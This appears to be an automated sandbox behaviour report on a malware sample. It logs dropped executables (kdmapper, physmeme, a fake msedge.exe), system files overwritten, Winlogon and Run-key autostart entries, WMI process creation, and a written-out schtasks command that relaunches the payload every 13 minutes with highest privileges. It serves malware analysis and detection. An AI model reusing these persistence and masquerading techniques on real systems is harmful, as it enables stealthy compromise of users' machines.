Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Edge\msedge.exe	Section loaded: uxtheme.dll
Source: C:\Edge\msedge.exe	Section loaded: windows.storage.dll
Source: C:\Edge\msedge.exe	Section loaded: wldp.dll
Source: C:\Edge\msedge.exe	Section loaded: profapi.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptsp.dll
Source: C:\Edge\msedge.exe	Section loaded: rsaenh.dll
Source: C:\Edge\msedge.exe	Section loaded: cryptbase.dll
Source: C:\Edge\msedge.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: gh3zRWl4or.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: gh3zRWl4or.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: gh3zRWl4or.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: gh3zRWl4or.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: gh3zRWl4or.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: gh3zRWl4or.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: gh3zRWl4or.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: gh3zRWl4or.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: gh3zRWl4or.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000006.00000003.1361668958.0000000005244000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000006.00000003.1359428900.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 00000006.00000000.1351838623.0000000000653000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.pdb source: msedge.exe, 00000010.00000002.1577856617.0000000003522000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.2229912737.000000001AE15000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: msedge.exe, 00000036.00000002.1978196231.00000000010C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\Ghosty\build\usermode\usermode.pdb source: gh3zRWl4or.exe
Source:	Binary string: em.pdb source: msedge.exe, 00000036.00000002.2118185806.000000001B611000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\Ghosty\build\usermode\usermode.pdb66 source: gh3zRWl4or.exe
Source:	Binary string: m.pdb source: msedge.exe, 00000036.00000002.2118185806.000000001B580000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 00000008.00000003.1365070939.000001D6FD270000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.1364865814.000001D6FD2CD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.1364609974.000001D6FD2CD000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.1364788311.000001D6FD2CD000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.8.dr
Source:	Binary string: stem.pdbpdbtem.pdb source: LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.2229912737.000000001AE15000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 5ye\obj\Release\Fcs.pdb source: curl.exe, 00000008.00000003.1364788311.000001D6FD2B4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: msedge.exe, 00000036.00000002.1978196231.00000000010C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.pdb source: msedge.exe, 00000010.00000002.1577856617.0000000003522000.00000004.00000800.00020000.00000000.sdmp

Source: gh3zRWl4or.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: gh3zRWl4or.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: gh3zRWl4or.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: gh3zRWl4or.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: gh3zRWl4or.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.cmdline"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.cmdline"	Jump to behavior

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

Code function: 0_2_00007FF674174760 GetModuleHandleA,GetProcAddress,VirtualProtect,VirtualProtect,LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,QueryPerformanceFrequency,QueryPerformanceCounter,QueryPerformanceCounter,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,

0_2_00007FF674174760

Source: C:\Windows\Speech\kdmapper.exe

File created: C:\Edge\__tmp_rar_sfx_access_check_5929781

Jump to behavior

Source: kdmapper.exe.5.dr

Static PE information: section name: .didat

Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0063F640 push ecx; ret	6_2_0063F653
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0063EB78 push eax; ret	6_2_0063EB96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00440905 push ecx; retf	12_2_00440906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 12_2_00452DD9 push eax; retf	12_2_004534E2
Source: C:\Edge\msedge.exe	Code function: 16_2_00007FFAAC304B92 pushad ; retf	16_2_00007FFAAC304B95
Source: C:\Edge\msedge.exe	Code function: 16_2_00007FFAAC6F8B28 push eax; ret	16_2_00007FFAAC6F8B29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 29_2_00007FFAAC1FD2A5 pushad ; iretd	29_2_00007FFAAC1FD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 29_2_00007FFAAC3E2316 push 8B485F94h; iretd	29_2_00007FFAAC3E231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFAAC20D2A5 pushad ; iretd	30_2_00007FFAAC20D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFAAC3F2316 push 8B485F93h; iretd	30_2_00007FFAAC3F231B
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 35_2_00007FFAAC324B92 pushad ; retf	35_2_00007FFAAC324B95
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 35_2_00007FFAAC357A05 push eax; iretd	35_2_00007FFAAC357A4D
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 35_2_00007FFAAC3579C5 push eax; iretd	35_2_00007FFAAC357A4D
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 35_2_00007FFAAC33967D push edi; ret	35_2_00007FFAAC339688
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 35_2_00007FFAAC338AC3 push ss; iretd	35_2_00007FFAAC338AC9
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 37_2_00007FFAAC367A05 push eax; iretd	37_2_00007FFAAC367A4D
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 37_2_00007FFAAC3679C5 push eax; iretd	37_2_00007FFAAC367A4D
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 37_2_00007FFAAC34967D push edi; ret	37_2_00007FFAAC349688
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 37_2_00007FFAAC348AC3 push ss; iretd	37_2_00007FFAAC348AC9
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 37_2_00007FFAAC334B92 pushad ; retf	37_2_00007FFAAC334B95
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Code function: 37_2_00007FFAAC728B28 push eax; ret	37_2_00007FFAAC728B29
Source: C:\Edge\msedge.exe	Code function: 38_2_00007FFAAC314B92 pushad ; retf	38_2_00007FFAAC314B95
Source: C:\Edge\msedge.exe	Code function: 38_2_00007FFAAC32967D push edi; ret	38_2_00007FFAAC329688
Source: C:\Edge\msedge.exe	Code function: 38_2_00007FFAAC328AC3 push ss; iretd	38_2_00007FFAAC328AC9
Source: C:\Edge\msedge.exe	Code function: 38_2_00007FFAAC347A05 push eax; iretd	38_2_00007FFAAC347A4D
Source: C:\Edge\msedge.exe	Code function: 38_2_00007FFAAC3479C5 push eax; iretd	38_2_00007FFAAC347A4D
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFAAC334B92 pushad ; retf	39_2_00007FFAAC334B95
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFAAC367A05 push eax; iretd	39_2_00007FFAAC367A4D
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFAAC3679C5 push eax; iretd	39_2_00007FFAAC367A4D
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFAAC34967D push edi; ret	39_2_00007FFAAC349688
Source: C:\Edge\msedge.exe	Code function: 39_2_00007FFAAC348AC3 push ss; iretd	39_2_00007FFAAC348AC9

Source: msedge.exe.6.dr	Static PE information: section name: .text entropy: 7.556050087022216
Source: physmeme.exe.8.dr	Static PE information: section name: .text entropy: 7.9965850430662675
Source: LBUPSPkYsNXrxZEtdVzCng.exe.16.dr	Static PE information: section name: .text entropy: 7.556050087022216

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Executable created and started: C:\Windows\Speech\physmeme.exe			Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Executable created and started: C:\Windows\Speech\kdmapper.exe			Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	File created: C:\Users\user\Desktop\aowVPJEW.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\fnSuHmrC.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	File created: C:\Users\user\Desktop\BegQTYoT.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	File created: C:\Users\user\Desktop\uNKjQhPt.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\ZcXEVMnO.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\XkTUfoHN.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Windows\Speech\kdmapper.exe	File created: C:\Edge\msedge.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\OPvxZeSl.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\ASIzYbXK.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\sozKoiId.log	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\kdmapper.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\HiOQLkRz.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\KAbPIEds.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\vpYzbqhQ.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	File created: C:\Users\user\Desktop\dZblWXPP.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	File created: C:\Users\user\Desktop\TqIVmuJi.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\xSuJhsEU.log	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\physmeme.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\kdmapper.exe	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\physmeme.exe	Jump to dropped file

Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\OPvxZeSl.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\XkTUfoHN.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\HiOQLkRz.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\vpYzbqhQ.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\fnSuHmrC.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	File created: C:\Users\user\Desktop\uNKjQhPt.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	File created: C:\Users\user\Desktop\dZblWXPP.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	File created: C:\Users\user\Desktop\TqIVmuJi.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	File created: C:\Users\user\Desktop\BegQTYoT.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	File created: C:\Users\user\Desktop\aowVPJEW.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\xSuJhsEU.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\KAbPIEds.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\ASIzYbXK.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\sozKoiId.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\ZcXEVMnO.log	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Edge\msedge.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell			Jump to behavior
Source: C:\Edge\msedge.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell			Jump to behavior

Creates multiple autostart registry keys

Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge			Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LBUPSPkYsNXrxZEtdVzCng			Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\Speech\physmeme.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 13 /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f

Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LBUPSPkYsNXrxZEtdVzCng	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LBUPSPkYsNXrxZEtdVzCng	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
